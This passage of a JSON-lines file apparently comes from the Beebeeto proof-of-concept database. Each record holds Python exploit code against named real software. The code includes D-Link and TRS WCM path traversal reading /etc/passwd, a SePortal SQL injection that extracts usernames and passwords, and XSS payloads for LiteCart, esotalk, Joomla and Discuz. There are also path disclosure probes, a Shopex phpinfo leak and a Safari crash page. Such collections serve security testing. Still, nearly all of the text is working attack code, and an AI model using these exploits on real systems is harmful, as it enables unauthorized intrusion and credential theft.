Vulnerable is the next model: D-Link DCS-2103, Firmware 1.0.0. This model \r\n                    with other firmware versions also must be vulnerable.\r\n\r\n                    I found these vulnerabilities at 11.07.2014 and later informed D-Link. But \r\n                    they haven't answered. It looks like they are busy with fixing \r\n                    vulnerabilities in DAP-1360, which I wrote about earlier.\r\n                    ''',\r\n            'references': ['http://www.intelligentexploit.com/view-details.html?id=20197',\r\n            ]\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def exploit(cls, args):\r\n        payload = '/cgi-bin/sddownload.cgi?file=/../../etc/passwd'\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if 'root:' in content and 'nobody:' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n            args['poc_ret']['passwd'] = content\r\n        return args\r\n\r\n\r\n    verify = exploit\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Vulnerable is the next model: D-Link DCS-2103, Firmware 1.0.0. This model with other firmware versions also must be vulnerable.\r\nI found these vulnerabilities at 11.07.2014 and later informed D-Link. But they haven't answered. It looks like they are busy with fixing vulnerabilities in DAP-1360, which I wrote about earlier.", "app_name": "D-LINK", "id": "poc-2014-0149", "layer4_protocol": null}
+{"create_date": "2014-11-18 10:26:00", "name": "Safari 8.0 / OS X 10.10 - Crash POC", "level": "\u4f4e\u5371", "batchable": 0, "author": "\u96f7\u8702", "rank": 2, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "Safari\u6f0f\u6d1e,Crash PoC", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0146',\r\n            'name': 'Safari 8.0 / OS X 10.10 - Crash POC',\r\n            'author': '\u96f7\u8702',\r\n            'create_date': '2014-11-18',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [10000],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Safari',\r\n            'vul_version': ['8.0'],\r\n            'type': 'Other',\r\n            'tag': ['Safari\u6f0f\u6d1e', 'Crash PoC'],\r\n            'desc': 'N/A',\r\n            'references': ['http://1337day.com/exploit/22884',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target']\r\n        if args['options']['verbose']:\r\n            print '[*] Generation'\r\n        temp = '''\r\n        <!DOCTYPE html>\r\n        <head>\r\n            <style>\r\n                svg {\r\n                    padding-top: 1337%;\r\n                    box-sizing: border-box;\r\n                }\r\n            </style>\r\n        </head>\r\n        <body>\r\n            <svg viewBox=\"0 0 500 500\" width=\"500\" height=\"500\">\r\n                <polyline points=\"1 1,2 2\"></polyline>\r\n            </svg>\r\n        </body>\r\n        </html>\r\n        '''\r\n        print '[*] Copy code: ' + temp\r\n        args['poc_ret']['vul_url'] = 'Generation ok'\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A --- Crash Crash Crash", "app_name": "Safari", "id": "poc-2014-0146", "layer4_protocol": null}
+{"create_date": "2014-11-08 18:34:55", "name": "SePortal 2.4 /poll.php SQL\u6ce8\u5165\u6f0f\u6d1e POC & Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "\u5c0f\u9a6c\u7532", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "SePortal\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/poll.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0141',\r\n            'name': 'SePortal 2.4 /poll.php SQL\u6ce8\u5165\u6f0f\u6d1e POC & Exploit',\r\n            'author': '\u5c0f\u9a6c\u7532',\r\n            'create_date': '2014-11-08',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'SePortal',\r\n            'vul_version': ['2.4'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['SePortal\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/poll.php', 'php'],\r\n            'desc': 'N/A',\r\n            'references': ['http://sebug.net/vuldb/ssvid-8867',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = ('1\\'%20union%20select%201,convert(concat_ws(0x3a3a,0x3A3A33763537,user_name,user_password,'\r\n                  '0x616536393A3A)+using+latin1),1,1,1,1,1,1,1,1%20from%20seportal_users%20limit%201,1--%20z')\r\n        verify_url = args['options']['target'] + '/poll.php?poll_id=' + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        u_p = re.findall('::3v57::(.*?)::(.*?)::ae69::', content)\r\n        if u_p:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    @classmethod\r\n    def exploit(cls, args):\r\n        payload = ('1\\'%20union%20select%201,convert(concat_ws(0x3a3a,0x3A3A33763537,user_name,user_password,'\r\n                  '0x616536393A3A)+using+latin1),1,1,1,1,1,1,1,1%20from%20seportal_users%20limit%201,1--%20z')\r\n        verify_url = args['options']['target'] + '/poll.php?poll_id=' + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        u_p = re.findall('::3v57::(.*?)::(.*?)::ae69::', content)\r\n        if u_p:\r\n            (username,password) = u_p[0]\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n            args['poc_ret']['DBInfo'] = {}\r\n            args['poc_ret']['DBInfo']['Username'] = username\r\n            args['poc_ret']['DBInfo']['Password'] = password\r\n        return args\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "Other", "id": "poc-2014-0141", "layer4_protocol": null}
+{"create_date": "2014-11-07 13:07:10", "name": "LiteCart 1.1.2.1 /search.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "foundu", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "LiteCart\u6f0f\u6d1e,XSS\u6f0f\u6d1e,/search.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0139',\r\n            'name': 'LiteCart 1.1.2.1 /search.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n            'author': 'foundu',\r\n            'create_date': '2014-11-07',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'LiteCart',\r\n            'vul_version': ['1.1.2.1'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['LiteCart\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', '/search.php', 'php'],\r\n            'desc': '''\r\n                    Several cross-site scripting vulnerabilities where discovered in LiteCart,\r\n                    an open source project that allows you to create a e-commerce sites.\r\n                    ''',\r\n            'references': ['https://www.netsparker.com/xss-vulnerabilities-in-litecart/',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = '''/search.php?query='\"--></style></scRipt><scRipt>alert(0x0000C0)</scRipt>'''\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if '<scRipt>alert(0x0000C0)</scRipt>' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Several cross-site scripting vulnerabilities where discovered in LiteCart, an open source project that allows you to create a e-commerce sites.", "app_name": "LiteCart", "id": "poc-2014-0139", "layer4_protocol": null}
+{"create_date": "2014-11-05 15:23:45", "name": "Esotalk topic xss vulnerability POC", "level": "\u4e2d\u5371", "batchable": 0, "author": "Evi1m0", "rank": 3, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "esotalk\u6f0f\u6d1e,xss,topic xss vul,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0137',\r\n            'name': 'Esotalk topic xss vulnerability POC',\r\n            'author': 'evi1m0',\r\n            'create_date': '2014-11-05',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'esotalk',\r\n            'vul_version': ['1.0'],\r\n            'type': 'Cross Site Request Forgery',\r\n            'tag': ['esotalk\u6f0f\u6d1e', 'xss', 'topic xss vul', 'php'],\r\n            'desc': 'esotalk topic xss vul.',\r\n            'references': ['http://www.hackersoul.com/post/ff0000-hsdb-0006.html',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target']\r\n        temp = '''\r\n        [url=[img]onmouseover=alert(document.cookie);//://example.com/image.jpg#\"aaaaaa[/img]]evi1m0[/url]\r\n        '''\r\n        print '[*] Copy code: ' + temp\r\n        print '[*] Specific use: ' + str(MyPoc.poc_info['vul']['references'])\r\n        args['success'] = True\r\n        args['poc_ret']['vul_url'] = 'Generation ok'\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "esotalk topic xss vul.", "app_name": "esotalk", "id": "poc-2014-0137", "layer4_protocol": null}
+{"create_date": "2014-11-01 17:25:13", "name": "Cmstop 1.0 /apps/system/view/template/edit.php Path Disclosure POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "foundu", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "cmstop\u4fe1\u606f\u6cc4\u9732,cmstop\u7206\u8def\u5f84,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0135',\r\n            'name': 'Cmstop 1.0 /apps/system/view/template/edit.php Path Disclosure POC',\r\n            'author': 'foundu',\r\n            'create_date': '2014-11-01',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'cmstop',\r\n            'vul_version': ['1.0'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['cmstop\u4fe1\u606f\u6cc4\u9732', 'cmstop\u7206\u8def\u5f84', 'php'],\r\n            'desc': 'N/A',\r\n            'references': ['https://www.yascanner.com/#!/n/56',\r\n                           ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        file_list =  ['/cmstop/apps/system/view/template/edit.php',\r\n                      '/apps/system/view/template/edit.php',]\r\n        args['poc_ret']['file_path'] = []\r\n        for filename in file_list:\r\n            verify_url = args['options']['target'] + filename\r\n            try:\r\n                if args['options']['verbose']:\r\n                    print '[*] Requst URL: ' + verify_url\r\n                req = urllib2.urlopen(verify_url)\r\n                content = req.read()\r\n            except:\r\n                continue\r\n            m = re.search(' in <b>([^<]+)</b> on line <b>(\\d+)</b>', content)\r\n            if m:\r\n                args['success'] = True\r\n                args['poc_ret']['file_path'].append(verify_url)\r\n        if not args['poc_ret']['file_path']:\r\n            args['poc_ret'].pop('file_path')\r\n            args['success'] = False\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "CMSTOP", "id": "poc-2014-0135", "layer4_protocol": null}
+{"create_date": "2014-11-01 17:18:56", "name": "Wordpress full Path Disclosure Vulnerability POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "foundu", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Wordpress\u4fe1\u606f\u6cc4\u9732,Wordpress\u7206\u8def\u5f84,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0134',\r\n            'name': 'Wordpress full Path Disclosure Vulnerability POC',\r\n            'author': 'foundu',\r\n            'create_date': '2014-11-01',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Wordpress',\r\n            'vul_version': ['*'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['Wordpress\u4fe1\u606f\u6cc4\u9732', 'Wordpress\u7206\u8def\u5f84', 'php'],\r\n            'desc': 'N/A',\r\n            'references': ['https://www.yascanner.com/#!/n/53',\r\n                           ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        file_list =  ['/wp-includes/registration-functions.php',\r\n                      '/wp-includes/registration.php',\r\n                      '/wp-includes/user.php',\r\n                      '/wp-includes/rss-functions.php',]\r\n        args['poc_ret']['file_path'] = []\r\n        for filename in file_list:\r\n            verify_url = args['options']['target'] + filename\r\n            try:\r\n                if args['options']['verbose']:\r\n                    print '[*] Requst URL: ' + verify_url\r\n                req = urllib2.urlopen(verify_url)\r\n                content = req.read()\r\n            except:\r\n                continue\r\n            m = re.search('</b>:[^\\r\\n]+ in <b>([^<]+)</b> on line <b>(\\d+)</b>', content)\r\n            if m:\r\n                args['success'] = True\r\n                args['poc_ret']['file_path'].append(verify_url)\r\n        if not args['poc_ret']['file_path']:\r\n            args['poc_ret'].pop('file_path')\r\n            args['success'] = False\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u6548\u679c\u8fd8\u4e0d\u9519", "app_name": "WordPress", "id": "poc-2014-0134", "layer4_protocol": null}
+{"create_date": "2014-10-31 11:01:33", "name": "TRS wcm\u7cfb\u7edf /wcm/app/system/read_image.jsp \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "wangjianyu", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "TRS wcm\u6f0f\u6d1e,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e,/wcm/app/system/read_image.jsp,jsp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0131',\r\n            'name': 'TRS wcm\u7cfb\u7edf /wcm/app/system/read_image.jsp \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n            'author': 'wangjianyu',\r\n            'create_date': '2014-10-31',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'TRS WCM',\r\n            'vul_version': '*',\r\n            'type': 'Arbitrary File Download',\r\n            'tag': ['TRS wcm\u6f0f\u6d1e', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', '/wcm/app/system/read_image.jsp', 'jsp'],\r\n            'desc': 'N/A',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2014-061225',\r\n            ]\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = '/wcm/app/system/read_image.jsp?filename=../../../../../../../../../../../../../../../../../etc/passwd'\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if \"root:\" in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "TRS", "id": "poc-2014-0131", "layer4_protocol": null}
+{"create_date": "2014-10-30 16:03:18", "name": "Shopex /svinfo.php phpinfo\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "user1018", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Shopex\u4fe1\u606f\u6cc4\u9732,phpinfo\u6cc4\u9732,php,svinfo.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0129',\r\n            'name': 'Shopex /svinfo.php phpinfo\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e POC',\r\n            'author': 'user1018',\r\n            'create_date': '2014-10-30',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Shopex',\r\n            'vul_version': ['*'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['Shopex\u4fe1\u606f\u6cc4\u9732', 'phpinfo\u6cc4\u9732', 'php', 'svinfo.php'],\r\n            'desc': '''\r\n                    http://sitename/app/dev/svinfo.php?phpinfo=true\r\n                    http://sitename/app/dev/svinfo.php?download=true\r\n                    http://sitename/install/svinfo.php?phpinfo=true\r\n                    ''',\r\n            'references': ['N/A',\r\n                           ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        file_list =  ['/app/dev/svinfo.php?phpinfo=true',\r\n                      '/install/svinfo.php?phpinfo=true',\r\n                      '/app/dev/svinfo.php?download=true']\r\n        args['poc_ret']['file_path'] = []\r\n        for filename in file_list:\r\n            verify_url = args['options']['target'] + filename\r\n            try:\r\n                if args['options']['verbose']:\r\n                    print '[*] Requst URL: ' + verify_url\r\n                req = urllib2.urlopen(verify_url)\r\n                content = req.read()\r\n            except:\r\n                continue\r\n            if 'ShopEx' in content and 'MySQL' in content:\r\n                args['success'] = True\r\n                args['poc_ret']['file_path'].append(verify_url)\r\n        if not args['poc_ret']['file_path']:\r\n            args['poc_ret'].pop('file_path')\r\n            args['success'] = False\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "http://sitename/app/dev/svinfo.php?phpinfo=true\r\nhttp://sitename/app/dev/svinfo.php?download=true\r\nhttp://sitename/install/svinfo.php?phpinfo=true", "app_name": "ShopEx", "id": "poc-2014-0129", "layer4_protocol": null}
+{"create_date": "2014-10-29 13:31:40", "name": "Joomla BeaconDecode \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Joomla\u6f0f\u6d1e,XSS\u6f0f\u6d1e,BeaconDecode,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0126',\r\n            'name': 'Joomla BeaconDecode \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n            'author': 'tmp',\r\n            'create_date': '2014-10-29',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Joomla',\r\n            'vul_version': ['*'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['Joomla\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', 'BeaconDecode', 'php'],\r\n            'desc': 'Vulnerable File: index.php?option=com_beacondecode&task=',\r\n            'references': ['https://www.yascanner.com/#!/x/19498',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = '/index.php?option=com_beacondecode&task=\"/><script>alert(233)</script>'\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if '\"/><script>alert(233)</script>' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Vulnerable File: index.php?option=com_beacondecode&task=", "app_name": "Joomla", "id": "poc-2014-0126", "layer4_protocol": null}
+{"create_date": "2014-10-29 13:30:38", "name": "Discuz! 6.0 /viewthread.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Discuz\u6f0f\u6d1e,XSS\u6f0f\u6d1e,/viewthread.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0125',\r\n            'name': 'Discuz! 6.0 /viewthread.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n            'author': 'tmp',\r\n            'create_date': '2014-10-29',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Discuz',\r\n            'vul_version': ['6.0'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['Discuz\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', '/viewthread.php', 'php'],\r\n            'desc': 'Cross site scripting has benn found on viewthread.php file.',\r\n            'references': ['https://www.yascanner.com/#!/x/11200',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target'] + '/viewthread.php?tid=\"/><script>alert(233)</script>'\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if '\"/><script>alert(233)</script>' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Cross site scripting has benn found on viewthread.php file.", "app_name": "Discuz", "id": "poc-2014-0125", "layer4_protocol": null}
